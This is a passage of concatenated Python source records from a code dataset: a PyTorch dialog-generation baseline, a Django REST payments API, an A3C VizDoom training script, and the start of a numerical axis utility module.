(self.profile_contexts.sum(-1) != 0).float()\n # self.profile_contexts = self.profile_contexts.view(-1, self.max_utt_len)\n # profile_embedding = self.embedding(self.profile_contexts)\n # profile_idx = self.idxembedding(self.profile_contexts)\n # profile_embedding, p_sent_size = get_idf(profile_embedding, profile_idx)\n # profile_embedding = profile_embedding.view(-1, max_profile_len, p_sent_size)\n # if self.keep_prob < 1.0:\n # input_embedding = F.dropout(input_embedding, 1 - self.keep_prob, self.training)\n #\n # # convert floors into 1 hot\n # floor_one_hot = self.floors.new_zeros((self.floors.numel(), 2), dtype=torch.float)\n # floor_one_hot.data.scatter_(1, self.floors.view(-1,1), 1)\n # floor_one_hot = floor_one_hot.view(-1, max_dialog_len, 2)\n # joint_embedding_input = torch.cat([input_embedding, floor_one_hot], 2)\n\n with variable_scope.variable_scope(\"contextRNN\"):\n # and enc_last_state will be same as the true last state\n # self.enc_cell.eval()\n _, enc_last_state = utils.dynamic_rnn(\n self.enc_cell,\n joint_embedding_input,\n sequence_length=self.context_lens)\n\n if self.num_layer > 1:\n enc_last_state = torch.cat([_ for _ in torch.unbind(enc_last_state)], 1)\n else:\n enc_last_state = enc_last_state.squeeze(0)\n\n with variable_scope.variable_scope(\"generationNetwork\"):\n dec_inputs = enc_last_state\n\n # Decoder\n if self.num_layer > 1:\n dec_init_state = [self.dec_init_state_net[i](dec_inputs) for i in range(self.num_layer)]\n dec_init_state = torch.stack(dec_init_state)\n else:\n dec_init_state = self.dec_init_state_net(dec_inputs).unsqueeze(0)\n\n with variable_scope.variable_scope(\"decoder\"):\n if mode == 'test':\n dec_outs, _, final_context_state = decoder_fn_lib.inference_loop(self.dec_cell, self.dec_cell_proj, self.embedding,\n encoder_state = dec_init_state,\n start_of_sequence_id=self.go_id,\n end_of_sequence_id=self.eos_id,\n maximum_length=self.max_utt_len,\n num_decoder_symbols=self.vocab_size,\n context_vector=None,\n decode_type='greedy')\n else:\n # loop_func = decoder_fn_lib.context_decoder_fn_train(dec_init_state, selected_attribute_embedding)\n # apply 
word dropping. Set dropped word to 0\n                    input_tokens = self.output_tokens[:, :-1]\n                    if self.dec_keep_prob < 1.0:\n                        # if token is 0, then embedding is 0, it's the same as word drop\n                        keep_mask = input_tokens.new_empty(input_tokens.size()).bernoulli_(self.dec_keep_prob)\n                        input_tokens = input_tokens * keep_mask\n\n                    dec_input_embedding = self.embedding(input_tokens)\n                    dec_seq_lens = self.output_lens - 1\n\n                    # Apply embedding dropout\n                    dec_input_embedding = F.dropout(dec_input_embedding, 1 - self.keep_prob, self.training)\n\n                    dec_outs, _, final_context_state = decoder_fn_lib.train_attention_loop(self.dec_cell, \n                                                                        self.dec_cell_proj, \n                                                                        dec_input_embedding,\n                                                                        atten_fn=self.atten_proj,\n                                                                        init_state=dec_init_state, \n                                                                        context_vector=profile_embedding, \n                                                                        max_length=max_dialog_len,\n                                                                        atten_mask=profile_mask)\n\n        if final_context_state is not None:\n            self.dec_out_words = final_context_state\n        else:\n            self.dec_out_words = torch.max(dec_outs, 2)[1]\n\n        if not mode == 'test':\n            with variable_scope.variable_scope(\"loss\"):\n                labels = self.output_tokens[:, 1:]\n                label_mask = torch.sign(labels).detach().float()\n\n                # rc_loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=dec_outs, labels=labels)\n                rc_loss = F.cross_entropy(dec_outs.view(-1, dec_outs.size(-1)), labels.reshape(-1), reduction='none').view(\n                    dec_outs.size()[:-1])\n                # print(rc_loss * label_mask)\n                rc_loss = torch.sum(rc_loss * label_mask, 1)\n                self.avg_rc_loss = rc_loss.mean()\n                # used only for perplexity calculation. Not used for optimization\n                self.rc_ppl = torch.exp(torch.sum(rc_loss) / torch.sum(label_mask))\n\n                self.summary_op = [ \\\n                    tb.summary.scalar(\"model/loss/rc_loss\", self.avg_rc_loss.item())]\n\n                # self.log_p_z = norm_log_liklihood(latent_sample, prior_mu, prior_logvar)\n                # self.log_q_z_xy = norm_log_liklihood(latent_sample, recog_mu, recog_logvar)\n                # self.est_marginal = torch.mean(rc_loss + bow_loss - self.log_p_z + self.log_q_z_xy)\n\n    def batch_2_feed(self, batch, global_t, use_prior, repeat=1):\n        context, context_lens, floors, topics, my_profiles, ot_profiles, outputs, output_lens, output_das, p_context, p_lens = batch\n        feed_dict = {\"input_contexts\": context, \"context_lens\":context_lens,\n                     \"floors\": floors, \"topics\":topics, \"my_profile\": my_profiles,\n                     \"ot_profile\": ot_profiles, \"output_tokens\": outputs,\n                     \"output_das\": output_das, \"output_lens\": output_lens,\n                     \"use_prior\": use_prior, \"profile_contexts\": p_context, \"profile_lens\":p_lens}\n        if repeat > 1:\n            tiled_feed_dict = {}\n            for key, val in feed_dict.items():\n                if key == \"use_prior\":\n                    tiled_feed_dict[key] = val\n                    continue\n                multipliers = [1]*len(val.shape)\n                multipliers[0] = repeat\n                tiled_feed_dict[key] = np.tile(val, multipliers)\n            feed_dict = tiled_feed_dict\n\n        if global_t is not None:\n            feed_dict[\"global_t\"] = global_t\n\n        if torch.cuda.is_available():\n            feed_dict = {k: torch.from_numpy(v).cuda() if isinstance(v, np.ndarray) else v for k, v in feed_dict.items()}\n        else:\n            feed_dict = {k: torch.from_numpy(v) if isinstance(v, np.ndarray) else v for k, v in feed_dict.items()}\n\n        return feed_dict\n\n    def train_model(self, global_t, train_feed, update_limit=5000, use_profile=False):\n        rc_losses = []\n        rc_ppls = []\n        local_t = 0\n        start_time = time.time()\n        loss_names = [\"rc_loss\", \"rc_peplexity\"]\n        while True:\n            batch = train_feed.next_batch()\n            if batch is None:\n                break\n            if update_limit is not None and local_t >= update_limit:\n                break\n            feed_dict = self.batch_2_feed(batch, global_t, use_prior=False)\n                
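# forward() populates self.avg_rc_loss and self.rc_ppl for this batch;\n                # optimize() below then backpropagates the reconstruction loss.\n                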
self.forward(feed_dict, use_profile=use_profile, mode='train')\n rc_loss, rc_ppl = self.avg_rc_loss.item(), self.rc_ppl.item()\n\n self.optimize(self.avg_rc_loss)\n # print(elbo_loss, bow_loss, rc_loss, rc_ppl, kl_loss)\n for summary in self.summary_op:\n self.train_summary_writer.add_summary(summary, global_t)\n rc_ppls.append(rc_ppl)\n rc_losses.append(rc_loss)\n\n global_t += 1\n local_t += 1\n if local_t % (train_feed.num_batch // 10) == 0:\n kl_w = 0\n self.print_loss(\"%.2f\" % (train_feed.ptr / float(train_feed.num_batch)),\n loss_names, [rc_losses, rc_ppls], \"kl_w %f\" % kl_w)\n\n # finish epoch!\n torch.cuda.synchronize()\n epoch_time = time.time() - start_time\n avg_losses = self.print_loss(\"Epoch Done\", loss_names,\n [rc_losses, rc_ppls],\n \"step time %.4f\" % (epoch_time / train_feed.num_batch))\n\n return global_t, avg_losses[0]\n\n def valid_model(self, name, valid_feed, use_profile=False):\n rc_losses = []\n rc_ppls = []\n\n while True:\n batch = valid_feed.next_batch()\n if batch is None:\n break\n feed_dict = self.batch_2_feed(batch, None, use_prior=False, repeat=1)\n with torch.no_grad():\n self.forward(feed_dict, use_profile=use_profile, mode='valid')\n rc_loss, rc_ppl = self.avg_rc_loss.item(), self.rc_ppl.item()\n rc_losses.append(rc_loss)\n rc_ppls.append(rc_ppl)\n\n\n avg_losses = self.print_loss(name, [\"rc_loss\", \"rc_peplexity\"],\n [rc_losses, rc_ppls], \"\")\n return avg_losses, [\"rc_loss\", \"rc_peplexity\"]\n\n def test_model(self, test_feed, num_batch=None, repeat=5, dest=sys.stdout, use_profile=False):\n local_t = 0\n recall_bleus = []\n prec_bleus = []\n\n while True:\n batch = test_feed.next_batch()\n if batch is None or (num_batch is not None and local_t > num_batch):\n break\n feed_dict = self.batch_2_feed(batch, None, use_prior=True, repeat=1)\n with torch.no_grad():\n self.forward(feed_dict, mode='test', use_profile=use_profile)\n word_outs = self.dec_out_words.cpu().numpy()\n sample_words = word_outs #np.split(word_outs, repeat, axis=0)\n\n true_floor = feed_dict[\"floors\"].cpu().numpy()\n true_srcs = feed_dict[\"input_contexts\"].cpu().numpy()\n true_src_lens = feed_dict[\"context_lens\"].cpu().numpy()\n true_outs = feed_dict[\"output_tokens\"].cpu().numpy()\n profile = feed_dict[\"profile_contexts\"].cpu().numpy()\n #true_topics = feed_dict[\"topics\"].cpu().numpy()\n #true_das = feed_dict[\"output_das\"].cpu().numpy()\n local_t += 1\n\n if dest != sys.stdout:\n if local_t % (test_feed.num_batch // 10) == 0:\n print(\"%.2f >> \" % (test_feed.ptr / float(test_feed.num_batch))),\n\n for b_id in range(test_feed.batch_size):\n # print the dialog context\n start = np.maximum(0, true_src_lens[b_id]-5)\n for t_id in range(start, true_srcs.shape[1], 1):\n src_str = \" \".join([self.vocab[e] for e in true_srcs[b_id, t_id].tolist() if e != 0])\n dest.write(\"Src %d-%d: %s\\n\" % (t_id, true_floor[b_id, t_id], src_str))\n for p_id in range(profile.shape[1]):\n profile_str = \" \".join([self.vocab[e] for e in profile[b_id, p_id].tolist() if e != 0])\n dest.write(\"Profile %d-%d: %s\\n\" % (p_id, 1, profile_str))\n # print the true outputs\n true_tokens = [self.vocab[e] for e in true_outs[b_id].tolist() if e not in [0, self.eos_id, self.go_id]]\n true_str = \" \".join(true_tokens).replace(\" ' \", \"'\")\n #da_str = self.da_vocab[true_das[b_id]]\n # print the predicted outputs\n dest.write(\"Target >> %s\\n\" % ( true_str))\n local_tokens = []\n\n pred_outs = sample_words\n #pred_da = np.argmax(sample_das[r_id], axis=1)[0]\n pred_tokens = [self.vocab[e] 
for e in pred_outs[b_id].tolist() if e != self.eos_id and e != 0]\n pred_str = \" \".join(pred_tokens).replace(\" ' \", \"'\")\n dest.write(\"Sample %d >> %s\\n\" % (0, pred_str))\n local_tokens.append(pred_tokens)\n\n max_bleu, avg_bleu = utils.get_bleu_stats(true_tokens, local_tokens)\n recall_bleus.append(max_bleu)\n prec_bleus.append(avg_bleu)\n # make a new line for better readability\n dest.write(\"\\n\")\n\n avg_recall_bleu = float(np.mean(recall_bleus))\n avg_prec_bleu = float(np.mean(prec_bleus))\n avg_f1 = 2*(avg_prec_bleu*avg_recall_bleu) / (avg_prec_bleu+avg_recall_bleu+10e-12)\n report = \"Avg recall BLEU %f, avg precision BLEU %f and F1 %f (only 1 reference response. Not final result)\" \\\n % (avg_recall_bleu, avg_prec_bleu, avg_f1)\n print(report)\n dest.write(report + \"\\n\")\n print(\"Done testing\")\n","sub_path":"models/baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":22374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"106005640","text":"from payments.serializers import *\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom django.db import transaction\nimport coreapi\nfrom rest_framework.decorators import api_view, renderer_classes\nfrom rest_framework import renderers, response\nfrom rest_framework_swagger.renderers import OpenAPIRenderer, SwaggerUIRenderer\n\n\nclass Accounts(APIView):\n def get(self, request, format=None):\n \"\"\"\n List all accounts\n\n Use this method to retrieve a list of all accounts in the database including their attributes.\n \"\"\"\n accounts = Account.objects.all()\n serializer = AccountSerializer(accounts, many=True)\n return Response(serializer.data)\n\n\nclass Payments(APIView):\n def get(self, request, format=None):\n \"\"\"\n List all payments\n\n Use this method to retrieve a list of all payments in the database including their attributes.\n \"\"\"\n payments = Payment.objects.all()\n serializer = PaymentSerializer(payments, many=True)\n return Response(serializer.data)\n\n\n @transaction.atomic\n def post(self, request, format=None):\n \"\"\"\n Create a new payment\n\n Use this method to create a new payment in the database. This method uses the PaymentSerializer which performs\n the validation prior to saving. 
This method is run as a Transaction to avoid race conditions, for example, if\n there are two debits on an account with low balance at the same time, the transaction will lock the tables\n and only validate each transaction if the account balance is high enough, among other checks.\n\n Inputs\n to_account: the id of thh destination account\n from_account: the id of the origin account\n amount: the amount, in the account's currency, to transfer\n \"\"\"\n serializer = PaymentSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n# This schema documentation can most certainly be done better, but for now..\nschema = coreapi.Document(\n title='QuickPay Sample Project API',\n content={\n 'accounts': coreapi.Link(\n url='/accounts/',\n action='get',\n fields=[],\n description='Return list of all accounts.'\n ),\n 'payments-get': coreapi.Link(\n url='/payments/',\n action='get',\n fields=[],\n description='Return list of all payments.'\n ),\n 'payments-post': coreapi.Link(\n url='/payments/',\n action='post',\n fields=[\n coreapi.Field(\n name='from_account',\n description='Account ID of the origin account (string)',\n required=True\n ),\n coreapi.Field(\n name='to_account',\n description='Account ID of the destination account (string)',\n required=True\n ),\n coreapi.Field(\n name='amount',\n description='Decimal amount of the transfer (decimal)',\n required=True\n )\n ],\n description='Submit a new payment.'\n )\n }\n)\n\n\n@api_view()\n@renderer_classes([OpenAPIRenderer, SwaggerUIRenderer, renderers.CoreJSONRenderer])\ndef schema_view(request):\n \"\"\"\n Generate the schema documentation page\n\n This method uses the schema definition defined above and generates the Swagger UI.\n \"\"\"\n return response.Response(schema)","sub_path":"payments/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"372595229","text":"import threading\nimport multiprocessing\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport tensorflow.contrib.slim as slim\nimport scipy.signal\nimport skimage\nfrom skimage import transform\n\nfrom helper import *\nfrom vizdoom import *\n\nfrom random import choice\nfrom time import sleep\nfrom time import time\nimport os\n\ndef make_gif(images, fname, duration=2, true_image=False,salience=False,salIMGS=None):\n import moviepy.editor as mpy\n \n def make_frame(t):\n try:\n x = images[int(len(images)/duration*t)]\n except:\n x = images[-1]\n\n if true_image:\n return x.astype(np.uint8)\n else:\n return ((x+1)/2*255).astype(np.uint8)\n \n def make_mask(t):\n try:\n x = salIMGS[int(len(salIMGS)/duration*t)]\n except:\n x = salIMGS[-1]\n return x\n\n clip = mpy.VideoClip(make_frame, duration=duration)\n if salience == True:\n mask = mpy.VideoClip(make_mask, ismask=True,duration= duration)\n clipB = clip.set_mask(mask)\n clipB = clip.set_opacity(0)\n mask = mask.set_opacity(0.1)\n mask.write_gif(fname, fps = len(images) / duration,verbose=False)\n #clipB.write_gif(fname, fps = len(images) / duration,verbose=False)\n else:\n clip.write_gif(fname, fps = len(images) / duration,verbose=False)\n\ndef update_target_graph(from_scope, to_scope):\n from_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, from_scope)\n to_vars = 
tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, to_scope)\n\n    op_holder = []\n    for from_var, to_var in zip(from_vars, to_vars):\n        op_holder.append(to_var.assign(from_var))\n    return op_holder\n\ndef process_frame(frame):\n    s = frame[10:-10, 30:-30]\n    s = transform.resize(s,[84,84])\n    s = np.reshape(s, [np.prod(s.shape)])/255.0\n    return s\n\ndef discount(x, gamma):\n    # reverse the sequence, apply the IIR filter, then reverse back to get discounted returns\n    return scipy.signal.lfilter([1], [1, -gamma], x[::-1], axis=0)[::-1]\n\ndef normalized_columns_initializer(std=1.0):\n    def _initializer(shape, dtype=None, partition_info=None):\n        out = np.random.randn(*shape).astype(np.float32)\n        out *= std/np.sqrt(np.square(out).sum(axis=0, keepdims=True))\n        return tf.constant(out)\n    return _initializer\n\nclass ACNetwork():\n    def __init__(self, s_size, a_size, scope, trainer):\n        with tf.variable_scope(scope):\n            self.inputs = tf.placeholder(shape=[None, s_size], dtype=tf.float32)\n            self.imageIn = tf.reshape(self.inputs, shape=[-1, 84, 84, 1])\n            \n            self.conv1 = slim.conv2d(activation_fn=tf.nn.elu,\n                                    inputs=self.imageIn, \n                                    num_outputs=16,\n                                    kernel_size=[8,8],\n                                    stride=[4,4],\n                                    weights_initializer=tf.random_uniform_initializer(),\n                                    padding='VALID')\n\n            self.conv2 = slim.conv2d(activation_fn=tf.nn.elu,\n                                    inputs=self.conv1, \n                                    num_outputs=32,\n                                    kernel_size=[4,4],\n                                    stride=[2,2],\n                                    weights_initializer=tf.random_uniform_initializer(),\n                                    padding='VALID')\n\n            hidden = slim.fully_connected(slim.flatten(self.conv2), 256, activation_fn=tf.nn.elu,\n                                        weights_initializer=tf.random_uniform_initializer())\n\n            lstm_cell = tf.contrib.rnn.BasicLSTMCell(256, state_is_tuple=True)\n            c_init = np.zeros((1, lstm_cell.state_size.c), np.float32)\n            h_init = np.zeros((1, lstm_cell.state_size.h), np.float32)\n            self.state_init = [c_init, h_init]\n            c_in = tf.placeholder(tf.float32, [1, lstm_cell.state_size.c])\n            h_in = tf.placeholder(tf.float32, [1, lstm_cell.state_size.h])\n            self.state_in = (c_in, h_in)\n            rnn_in = tf.expand_dims(hidden, [0])\n            step_size = tf.shape(self.imageIn)[:1]\n            state_in = tf.contrib.rnn.LSTMStateTuple(c_in,h_in)\n            lstm_outputs, lstm_state = tf.nn.dynamic_rnn(\n                lstm_cell, rnn_in, initial_state=state_in, sequence_length=step_size,\n                time_major=False)\n            lstm_c, lstm_h = lstm_state\n            self.state_out = (lstm_c[:1, :], lstm_h[:1, :])\n            rnn_out = tf.reshape(lstm_outputs, [-1, 256])\n\n            self.policy = slim.fully_connected(rnn_out,\n                                                a_size,\n                                                activation_fn=tf.nn.softmax,\n                                                weights_initializer=normalized_columns_initializer(0.01),\n                                                biases_initializer=None)\n            self.value = slim.fully_connected(rnn_out,\n                                            1,\n                                            activation_fn=None,\n                                            weights_initializer=normalized_columns_initializer(1.0),\n                                            biases_initializer=None)\n\n            if scope != 'global':\n                self.actions = tf.placeholder(shape=[None], dtype=tf.int32)\n                self.actions_onehot = tf.one_hot(self.actions, a_size, dtype=tf.float32)\n                self.target_v = tf.placeholder(shape=[None], dtype=tf.float32)\n                self.advantages = tf.placeholder(shape=[None], dtype=tf.float32)\n\n                self.responsible_outputs = (tf.reduce_sum(self.policy*self.actions_onehot, [1]))\n                \n                self.value_loss = 0.5 * tf.reduce_sum(tf.square(self.target_v - tf.reshape(self.value, [-1])))\n                self.entropy = -tf.reduce_sum(self.policy*tf.log(self.policy))\n                self.policy_loss = -tf.reduce_sum(tf.log(self.responsible_outputs)*self.advantages)\n                self.loss = 0.5*self.value_loss + self.policy_loss - self.entropy * 0.01\n\n                local_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope)\n                self.gradients = tf.gradients(self.loss, local_vars)\n                self.var_norms = tf.global_norm(local_vars)\n                grads, self.grad_norms = tf.clip_by_global_norm(self.gradients, 40.0)\n\n                
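# A3C update: each worker computes gradients on its local parameters and\n                # applies them directly to the shared 'global' network's variables.\n                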
global_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, 'global')\n            self.apply_grads = trainer.apply_gradients(zip(grads, global_vars))\n\nclass Worker():\n    def __init__(self, game, name, s_size, a_size, trainer, model_path, global_episodes):\n        self.name = \"worker_\" + str(name)\n        self.number = name\n        self.model_path = model_path\n        self.trainer = trainer\n        self.global_episodes = global_episodes\n        self.increment = self.global_episodes.assign_add(1)\n        self.episode_rewards = []\n        self.episode_lengths = []\n        self.episode_mean_values = []\n        self.summary_writer = tf.summary.FileWriter(\"train_\"+str(self.number))\n\n        self.localac = ACNetwork(s_size, a_size, self.name, trainer)\n        self.update_local_ops = update_target_graph('global', self.name)\n        \n        game.set_doom_scenario_path(\"basic.wad\")\n        game.set_doom_map(\"map01\")\n        game.set_screen_resolution(ScreenResolution.RES_160X120)\n        game.set_screen_format(ScreenFormat.GRAY8)\n        game.set_render_hud(False)\n        game.set_render_crosshair(False)\n        game.set_render_weapon(True)\n        game.set_render_decals(False)\n        game.set_render_particles(False)\n        game.add_available_button(Button.MOVE_LEFT)\n        game.add_available_button(Button.MOVE_RIGHT)\n        game.add_available_button(Button.ATTACK)\n        game.add_available_game_variable(GameVariable.AMMO2)\n        game.add_available_game_variable(GameVariable.POSITION_X)\n        game.add_available_game_variable(GameVariable.POSITION_Y)\n        game.set_episode_timeout(300)\n        game.set_episode_start_time(10)\n        game.set_window_visible(False)\n        game.set_sound_enabled(False)\n        game.set_living_reward(-1)\n        game.set_mode(Mode.PLAYER)\n        game.init()\n        self.actions = np.identity(a_size, dtype=bool).tolist()\n\n        self.env = game\n\n    def train(self, rollout, sess, gamma, bootstrap_value):\n        rollout = np.array(rollout)\n        observations = rollout[:,0]\n        actions = rollout[:,1]\n        rewards = rollout[:,2]\n        next_observations = rollout[:,3]\n        values = rollout[:,5]\n\n        self.rewards_plus = np.asarray(rewards.tolist() + [bootstrap_value])\n        discounted_rewards = discount(self.rewards_plus, gamma)[:-1]\n        self.value_plus = np.asarray(values.tolist() + [bootstrap_value])\n        advantages = rewards + gamma*self.value_plus[1:] - self.value_plus[:-1]\n        advantages = discount(advantages, gamma)\n\n        feed_dict = {self.localac.target_v: discounted_rewards,\n            self.localac.inputs: np.vstack(observations),\n            self.localac.actions: actions,\n            self.localac.advantages: advantages,\n            self.localac.state_in[0]: self.batch_rnn_state[0],\n            self.localac.state_in[1]: self.batch_rnn_state[1]}\n        value_loss, policy_loss, entropy, grad_norms, var_norms, self.batch_rnn_state, _ = sess.run(\n            [self.localac.value_loss,\n            self.localac.policy_loss,\n            self.localac.entropy,\n            self.localac.grad_norms,\n            self.localac.var_norms,\n            self.localac.state_out,\n            self.localac.apply_grads],\n            feed_dict = feed_dict)\n        return value_loss / len(rollout), policy_loss / len(rollout), entropy / len(rollout), grad_norms, var_norms\n\n    def work(self, max_episode_length, gamma, sess, coord, saver):\n        episode_count = sess.run(self.global_episodes)\n        total_steps = 0\n        print(\"Starting worker \" + str(self.number))\n        with sess.as_default(), sess.graph.as_default():\n            while not coord.should_stop():\n                sess.run(self.update_local_ops)\n                episode_buffer = []\n                episode_values = []\n                episode_frames = []\n                episode_reward = 0\n                episode_step_count = 0\n                d = False\n\n                self.env.new_episode()\n                s = self.env.get_state().screen_buffer\n                episode_frames.append(s)\n                s = process_frame(s)\n                rnn_state = self.localac.state_init\n            
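# keep a separate copy of the LSTM state for the training batch; train() reads it and stores the updated state\n            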
self.batch_rnn_state = rnn_state\n while self.env.is_episode_finished() == False:\n a_dist, v, rnn_state = sess.run([self.localac.policy, self.localac.value, self.localac.state_out],\n feed_dict = {self.localac.inputs: [s],\n self.localac.state_in[0]: rnn_state[0],\n self.localac.state_in[1]: rnn_state[1]})\n a = np.random.choice(a_dist[0], p=a_dist[0])\n a = np.argmax(a_dist == a)\n\n r = self.env.make_action(self.actions[a]) / 100.0\n d = self.env.is_episode_finished()\n if d == False:\n s1 = self.env.get_state().screen_buffer\n episode_frames.append(s1)\n s1 = process_frame(s1)\n else: \n s1 = s\n\n episode_buffer.append([s, a, r, s1, d, v[0,0]])\n episode_values.append(v[0,0])\n\n episode_reward += r\n s = s1\n total_steps += 1\n episode_step_count += 1\n\n if len(episode_buffer) == 30 and d != True and episode_step_count != max_episode_length - 1:\n v1 = sess.run(self.localac.value,\n feed_dict = {self.localac.inputs: [s],\n self.localac.state_in[0]: rnn_state[0],\n self.localac.state_in[1]: rnn_state[1]})[0, 0]\n value_loss, policy_loss, entropy, grad_norms, var_norms = self.train(episode_buffer,\n sess,\n gamma,\n v1)\n episode_buffer = []\n sess.run(self.update_local_ops)\n if d == True:\n break\n\n self.episode_rewards.append(episode_reward)\n self.episode_lengths.append(episode_step_count)\n self.episode_mean_values.append(np.mean(episode_values))\n\n if len(episode_buffer) != 0:\n value_loss, policy_loss, entropy, grad_norms, var_norms = self.train(episode_buffer, \n sess,\n gamma,\n 0.0)\n\n if episode_count % 5 == 0 and episode_count != 0:\n if self.name == 'worker_0' and episode_count % 25 == 0:\n time_per_step = 0.05\n images = np.array(episode_frames)\n make_gif(images, './frames/image'+str(episode_count)+'.gif',\n duration=len(images)*time_per_step, true_image=True, salience=False)\n if episode_count % 250 == 0 and self.name == 'worker_0':\n saver.save(sess, self.model_path+'/model-'+str(episode_count)+'.cptk')\n print(\"Saved model\")\n\n mean_reward = np.mean(self.episode_rewards[-5:])\n mean_length = np.mean(self.episode_lengths[-5:])\n mean_value = np.mean(self.episode_mean_values[-5:])\n summary = tf.Summary()\n summary.value.add(tag='Perf/Reward', simple_value=float(mean_reward))\n summary.value.add(tag='Perf/Length', simple_value=float(mean_length))\n summary.value.add(tag='Perf/Value', simple_value=float(mean_value))\n summary.value.add(tag='Losses/Value Loss', simple_value=float(value_loss))\n summary.value.add(tag='Losses/Policy Loss', simple_value=float(policy_loss))\n summary.value.add(tag='Losses/Entropy', simple_value=float(entropy))\n summary.value.add(tag='Losses/Grad Norm', simple_value=float(grad_norms))\n summary.value.add(tag='Losses/Var Norm', simple_value=float(var_norms))\n self.summary_writer.add_summary(summary, episode_count)\n self.summary_writer.flush()\n\n if self.name == 'worker_0':\n sess.run(self.increment)\n episode_count += 1\n\nmax_episode_length = 300\ngamma = 0.99\ns_size = 7056\na_size = 3\nload_model = False\nmodel_path = './model'\n\ntf.reset_default_graph()\n\nif not os.path.exists(model_path):\n os.makedirs(model_path)\n\nwith tf.device(\"/cpu:0\"):\n global_episodes = tf.Variable(0, dtype=tf.int32, name='global_episodes', trainable=False)\n trainer = tf.train.AdamOptimizer(learning_rate=0.1)\n master_network = ACNetwork(s_size, a_size, 'global', None)\n num_workers = multiprocessing.cpu_count()\n workers = []\n\n for i in range(num_workers):\n workers.append(Worker(DoomGame(), i, s_size, a_size, trainer, model_path, 
global_episodes))\n saver = tf.train.Saver(max_to_keep=5)\n\nwith tf.Session() as sess:\n coord = tf.train.Coordinator()\n if load_model == True:\n print(\"Loading model...\")\n ckpt = tf.train.get_checkpoint_state(model_path)\n saver.restore(sess, ckpt.model_checkpoint_path)\n else:\n sess.run(tf.global_variables_initializer())\n\n worker_threads = []\n for worker in workers:\n worker_work = lambda: worker.work(max_episode_length, gamma, sess, coord, saver)\n t = threading.Thread(target=(worker_work))\n t.start()\n sleep(0.5)\n worker_threads.append(t)\n coord.join(worker_threads)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"101494962","text":"# -*- coding: utf-8 -*-\nfrom typing import Any\nfrom typing import Optional\nfrom typing import Tuple\nfrom typing import Union\n\nimport numpy as np\n\nfrom .types import AxisType\nfrom .types import GridAxisType\nfrom .types import is_basic_indexing\nfrom .utils.formatting import make_identifiable\n\n\ndef _log_axis(\n min_: Union[float, np.ndarray], max_: Union[float, np.ndarray], points: int\n) -> np.ndarray:\n \"\"\"Generates logarithmically spaced axis/array.\n\n Returns always an array with the shape (points,) + np.shape(min/max) and\n a floating dtype.\n \"\"\"\n if np.issubdtype(\n # min_\n type(min_) if not isinstance(min_, np.ndarray) else min_.dtype,\n np.floating,\n ) or np.issubdtype(\n # max_\n type(max_) if not isinstance(max_, np.ndarray) else max_.dtype,\n np.floating,\n ):\n dtype = None\n else:\n dtype = float\n\n return np.logspace(np.log10(min_), np.log10(max_), points, dtype=dtype)\n\n\ndef _lin_axis(\n min_: Union[float, np.ndarray], max_: Union[float, np.ndarray], points: int\n) -> np.ndarray:\n \"\"\"Generates linearly spaced axis/array.\n\n Returns always an array with the shape (points,) + np.shape(min/max) and\n a floating dtype.\n \"\"\"\n if np.issubdtype(\n # min_\n type(min_) if not isinstance(min_, np.ndarray) else min_.dtype,\n np.floating,\n ) or np.issubdtype(\n # max_\n type(max_) if not isinstance(max_, np.ndarray) else max_.dtype,\n np.floating,\n ):\n dtype = None\n else:\n dtype = float\n\n return np.linspace(min_, max_, points, dtype=dtype)\n\n\nclass Axis:\n def __init__(\n self,\n data: np.ndarray,\n *,\n name: str = \"unnamed\",\n label: str = \"\",\n unit: str = \"\",\n ):\n if not isinstance(data, np.ndarray):\n data = np.asanyarray(data)\n\n self._data = data if data.ndim > 0 else data[np.newaxis]\n\n name = make_identifiable(name)\n self._name = name if name else \"unnamed\"\n self._label = label\n self._unit = unit\n\n def __repr__(self) -> str:\n repr_ = f\"{self.__class__.__name__}(\"\n repr_ += f\"name='{self.name}', \"\n repr_ += f\"label='{self.label}', \"\n repr_ += f\"unit='{self.unit}', \"\n repr_ += f\"axis_dim={self.axis_dim}, \"\n repr_ += f\"len={len(self)}\"\n repr_ += \")\"\n\n return repr_\n\n def __len__(self) -> int:\n return len(self._data)\n\n def __iter__(self) -> \"Axis\":\n for d in self._data:\n yield self.__class__(\n d[np.newaxis], name=self.name, label=self.label, unit=self.unit,\n )\n\n def __getitem__(\n self, key: Union[int, slice, Tuple[Union[int, slice]]]\n ) -> \"Axis\":\n if not is_basic_indexing(key):\n raise IndexError(\"Only basic indexing is supported!\")\n\n key = np.index_exp[key]\n requires_new_axis = False\n\n # > determine if axis extension is required\n # 1st index (temporal slicing) not hidden if ndim == 
